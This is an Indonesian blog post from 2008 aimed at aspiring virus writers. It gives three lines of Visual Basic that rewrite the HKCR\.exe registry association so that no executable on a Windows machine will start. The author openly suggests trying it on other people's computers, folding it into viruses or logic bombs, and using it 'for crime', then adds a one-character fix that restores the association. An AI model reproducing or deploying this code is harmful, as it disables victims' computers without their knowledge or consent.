3 baris Pelumpuh Executable

21 12 2008

Hi All, temen – temen para virologer, kali ini saya coba berbagi tips tentang pemrograman Vb yang amat simple dengan implementasi yang sangat membahayakan. Sebagai catatan saja, sebenarnya cara ini sudah saya temukan ketika saya duduk di bangku kelas 2 SMA dari hasil ujicoba sendiri ketika pembuatan buku command prompt untuk kosumsi pribadi(No Sale gitu), Nah sekarang saya sudah kelas 4 SMA jadi bisa dihitung sendiri tips ini sudah ada 2tahunan yang lalu. Tapi tidak ada salahnya saya publish kembali, karena sebelumnya saya belum pernah menulis masalah ini ~ Sapa tau berguna buat kejahatan tentunya ~:P.

OK ~ mungkin terlalu mengada-ada judul artikel ini yaitu “3 baris Pelumpuh Executable”, tapi mau dikasih judul apa lagi, lawong disini emang saya menuliskan hanya 3 baris code untuk melakukan hal tersebut. Sebelum melakukan apa yang ada di artikel ini maka ada beberapa hal yang harus kamu perhatikan !!

Coba dulu dikomputer kamu sebelum mencoba dikomputer orang lain ( kalo mau dibuat virus gitu )

Jangan takut kerusakan ( sebenarnya tidak menimbulkan kerusakan, tapi kadang2 kita berpikir pendek dan melakukan install ulang hanya karena masalah ini )

Udah, yang penting pede !! Gitu aja deh

Buat Programnya

Dikarenakan codenya sangat pendek, saya tidak mau repot – repot menampilkan interface program, karena hanya terdiri dari beberapa baris code dan 1 command button. Udah sekarang kamu buka celana dalam kamu (emang mau gituan apa?), eh Ms Vibi kamu dan tambahkan sebuah “Commad Button” pada “Form” dengan property default.

Coding proram seperti berikut :

————————————————— Begin ————————————————-

Private Sub Command1_Click()

Dim Mei As Object

Set Mei = CreateObject(“wscript.shell”)

Mei.RegWrite “HKCR\.exe\”, “exefiles”, “REG_SZ”

End Sub

————————————————— End Code ———————————————-

Hayo, hitung berapa baris yang kita ketikan pada code di Atas, normalnya adalah 3 baris. Kamu bisa mengganti kata “exefiles” sesuka hati kamu asalkan bukan kata “exefile”, atau kamu tetap membiarkan kata “exefiles” tersebut.

Buktikan !!

Untuk membuktikan efek yang terjadi dari code di atas, coba jalankan program Vb yang dibuat di atas, dan klik tombol “Command 1”, and then …………………………..

Sekarang kamu jalankan program / file executable yang ada di komputer kamu, hmm..hmmmm…., apa yang terjadi hasilnya adalah seperti ini di komputer saya (versi Indo):

Implementasi !!

Implementasi dari code di atas, bisa ditambahkan pada manipulasi virus/logic bomb/apa aja dech untuk menjaili User lain atau bahkan untuk menolong user lain. Dah itu terserah kamu kalo masalah implementasi . . Key

Pemulihan !!

Karena saya tidak mau lepas dari tanggung jawab atas perbuatan bejat yang saya lakukan,😛😛, ada beberapa cara untuk memulihkan kekacauan yan diakibatkan code diatas. Buatlah program yan code dan interfacenya sama persis pada code diatas, hanya berbeda satu karakter saja, teliti dengan seksama code pemulih berikut :

—————————————————Begin————————————————-

Private Sub Command1_Click()

Dim Mei As Object

Set Mei = CreateObject(“wscript.shell”)

Mei.RegWrite “HKCR\.exe\”, “exefile”, “REG_SZ” ‘disini letak bedanya

End Sub

—————————————————EndCode———————————————-

Ending

Semoga berguna !!!

Salam Maniz

A.M Hirin


Aksi

Information

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s




%d blogger menyukai ini: